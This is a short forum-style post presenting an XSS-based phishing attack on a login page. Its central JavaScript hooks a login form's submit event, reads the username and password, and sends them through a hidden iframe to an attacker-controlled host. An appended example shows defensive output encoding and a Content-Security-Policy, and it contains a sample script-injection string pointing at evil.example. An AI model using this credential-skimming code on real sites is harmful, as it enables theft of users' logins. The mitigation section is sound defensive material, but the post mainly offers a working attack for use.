Xss Phishing


Phishing is constantly being reported, so I tried to put together a cool hack for you guys.
These hacks are becoming more and more famous day by day;
the vulnerabilities are growing and so are the hackers' activities.
But we first start with XSS.

XSS is certainly changing the way that phishing attacks are perpetrated.

For example, we have a target such as:
http://Thewebsite.com/google/add.php?request=

Suppose there is a login form and an XSS vulnerability on the
same page.
To perpetrate the phishing attack, one needs to inject JavaScript code into the
variable so that the victim's browser loads a JavaScript file.
From a brief analysis of the HTML that the site generates, I know that:

• The value that the variable “request” receives is not sanitized at all.

• The login form is named “login_clientes”

• The login form has two input fields for user data: “user” and “pass”.

So I will use the following JavaScript code:

<pre>loginForm = document.forms['login_clientes'];
function parseData()
{
var username = loginForm.user.value;
var password = loginForm.pass.value;
saveData(username,password);
return true;
}
function saveData(username,password)
{
var frame=document.createElement('iframe');
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" + password;
frame.style.display='none';
document.body.appendChild(frame);
}
loginForm.onsubmit = parseData;</pre>
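
From the defender's side, the unsanitized `request` value listed above is closed by encoding it on output, and a Content-Security-Policy stops injected script and the hidden iframe request even if an encoding step is missed. This is an added example, not code from the original post; the function names, the page markup, the `/login` action and the sample input are constructed for illustration.

```javascript
// Added example: server-side handling of the reflected "request" parameter.
// Markup, function names and the sample input are constructed assumptions.

// Page fragment with the login form described in the post.
const LOGIN_FORM =
  '<form name="login_clientes" action="/login" method="post">' +
  '<input name="user"><input name="pass" type="password"></form>';

// Constructed sample of a request value that carries markup.
const SAMPLE = '<script src="https://evil.example/x.js"></script>';

// Encode the characters that let a value break out of HTML text
// or out of a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": the value is written into the page exactly as received.
function renderVulnerable(request) {
  return '<p>Result for: ' + request + '</p>' + LOGIN_FORM;
}

// "After": same page, value encoded for the HTML context it lands in.
function renderHardened(request) {
  return '<p>Result for: ' + escapeHtml(request) + '</p>' + LOGIN_FORM;
}

// Second layer: response header sent with the page.
function cspHeader() {
  return [
    "default-src 'self'",
    "script-src 'self'",  // no inline script, no script from other hosts
    "frame-src 'self'",   // a hidden iframe to another host is refused
    "form-action 'self'", // the form can only post back to this origin
  ].join('; ');
}

console.log(renderHardened(SAMPLE));
console.log('Content-Security-Policy: ' + cspHeader());
```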
abhijeet